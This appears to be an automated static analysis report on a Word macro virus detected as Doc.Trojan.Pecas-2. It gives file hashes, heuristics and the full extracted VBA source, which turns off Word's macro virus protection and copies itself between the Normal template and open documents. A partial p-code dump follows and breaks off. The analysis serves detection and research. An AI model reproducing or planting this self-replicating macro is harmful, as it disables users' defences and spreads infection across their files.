Doc.Trojan.Pecas-2 — Office (OLE) malware analysis

Static analysis result for SHA-256 cc9dd37306c60159…

MALICIOUS

Office (OLE)

Size: 27.5 KB
Created: 2001-04-17 17:59:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 8978a8fee8f11f7a9f50678a617bbc82
SHA-1: 80d1afc880b21462cafde0ebedca00124af71d14
SHA-256: cc9dd37306c601590d6d1fda919f20859c9579b75bdb0bdd4b9f0c62ac43fa7e
Risk Score: 140

Malware Insights

Doc.Trojan.Pecas-2 · confidence 90%

MITRE ATT&CK
T1059.005 Visual Basic

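The sample is identified as malicious by ClamAV with the signature Doc.Trojan.Pecas-2. It contains a VBA macro whose Document_Close handler sets Options.VirusProtection and Options.SaveNormalPrompt to zero, then copies the "Pecas" module between the Normal template and the active document, which lets it spread to other documents. The macro also includes the hardcoded string 'pequitas te amo', which it types into the document on the 13th of the month and which might be a lure or part of an obfuscation technique.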

Heuristics (2)

  • [critical] ClamAV: Doc.Trojan.Pecas-2 (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Pecas-2
  • [medium] VBA macros detected (OLE_VBA_MACROS)
    Document contains VBA macro code

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 5490 bytes
SHA-256: b58d8a3b067139e082657adc259a776cb650fb999e2acddc0042fc569c1fcb2c
Detection
ClamAV: Doc.Trojan.Pecas-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Pecas"
Attribute VB_Base = "1Normal.Pecas"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

'by morris "vegueta"
'pequitas es mi novia
'mi viejo amigo " goto"
'dedicado para ti pequitas
'este virus tiene un bug en mi siguiente version lo solucionare
Private Sub Document_Close()
On Error Resume Next
Application.ScreenUpdating = False
Options.VirusProtection = (1 - 1)
Options.SaveNormalPrompt = (1 - 1)
Options.ConfirmConversions = (1 - 1)
Set plan = NormalTemplate.VBProject.VBComponents.Item(1)
Set activ = ActiveDocument.VBProject.VBComponents.Item(1)
Set temp = NormalTemplate.VBProject.VBComponents(1).CodeModule
bandera = 0
paso2:
cont = activ.CodeModule.countoflines
cont1 = plan.CodeModule.countoflines
var = plan.Name
If var = "Pecas" Then
  If activ.Name <> "Pecas" Then
   activ.CodeModule.DeleteLines 1, cont
    activ.CodeModule.InsertLines 1, temp.lines(1, cont1)
    activ.Name = plan.Name
      If bandera = 0 Then
      If InStr(1, ActiveDocument.Name, "Document") = 0 Then
        If Day(Now) = 13 Then Selection.TypeText "pequitas te amo"
       ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
       Else
       ActiveDocument.Saved = True
      End If
      End If
    End If
End If
bandera = bandera + 1
If bandera > 1 Then
Application.ScreenUpdating = False
Exit Sub
End If
Set activ = NormalTemplate.VBProject.VBComponents.Item(1)
Set plan = ActiveDocument.VBProject.VBComponents.Item(1)
Set temp = ActiveDocument.VBProject.VBComponents(1).CodeModule

GoTo paso2
End Sub

' Processing file: /opt/analyzer/scan_staging/deee8eb6b95b46209f0e5d85576b544f.bin
' ===============================================================================
' Module streams:
' Macros/VBA/Pecas - 3216 bytes
' Line #0:
' Line #1:
' 	QuoteRem 0x0000 0x0013 "by morris "vegueta""
' Line #2:
' 	QuoteRem 0x0000 0x0014 "pequitas es mi novia"
' Line #3:
' 	QuoteRem 0x0000 0x0016 "mi viejo amigo " goto""
' Line #4:
' 	QuoteRem 0x0000 0x0019 "dedicado para ti pequitas"
' Line #5:
' 	QuoteRem 0x0000 0x003E "este virus tiene un bug en mi siguiente version lo solucionare"
' Line #6:
' 	FuncDefn (Private Sub Document_Close())
' Line #7:
' 	OnError (Resume Next) 
' Line #8:
' 	LitVarSpecial (False)
' 	Ld Application 
' 	MemSt ScreenUpdating 
' Line #9:
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Sub 
' 	Paren 
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #10:
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Sub 
' 	Paren 
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #11:
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Sub 
' 	Paren 
' 	Ld Options 
' 	MemSt ConfirmConversions 
' Line #12:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	Set plan 
' Line #13:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	Set activ 
' Line #14:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	Set temp 
' Line #15:
' 	LitDI2 0x0000 
' 	St bandera 
' Line #16:
' 	Label paso2 
' Line #17:
' 	Ld activ 
' 	MemLd CodeModule 
' 	MemLd countoflines 
' 	St cont 
' Line #18:
' 	Ld plan 
' 	MemLd CodeModule 
' 	MemLd countoflines 
' 	St cont1 
' Line #19:
' 	Ld plan 
' 	MemLd New 
' 	St var 
' Line #20:
' 	Ld var 
' 	LitStr 0x0005 "Pecas"
' 	Eq 
' 	IfBlock 
' Line #21:
' 	Ld activ 
' 	MemLd New 
' 	LitStr 0x0005 "Pecas"
' 	Ne 
' 	IfBlock 
' Line #22:
' 	LitDI2 0x0001 
' 	Ld cont 
' 	Ld activ 
' 	MemLd CodeModule 
' 	ArgsMemCall DeleteLines 0x0002 
' Line #23:
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld cont1 
' 	Ld temp 
' 	ArgsMemLd lines 0x0002 
' 	Ld activ 
' 	MemLd CodeModule 
' 	ArgsMemCall InsertLines 0x0002 
' Line #24:
' 	Ld plan 
' 	MemLd New 
' 	Ld activ 
' 	MemSt New 
' Line #25:
' 	Ld bandera 
' 	LitDI2 0x0000 
' 	Eq 
' 	IfBlock 
' Line #26:
' 	LitDI2 0x0001 
' 	Ld ActiveDocu
... (truncated)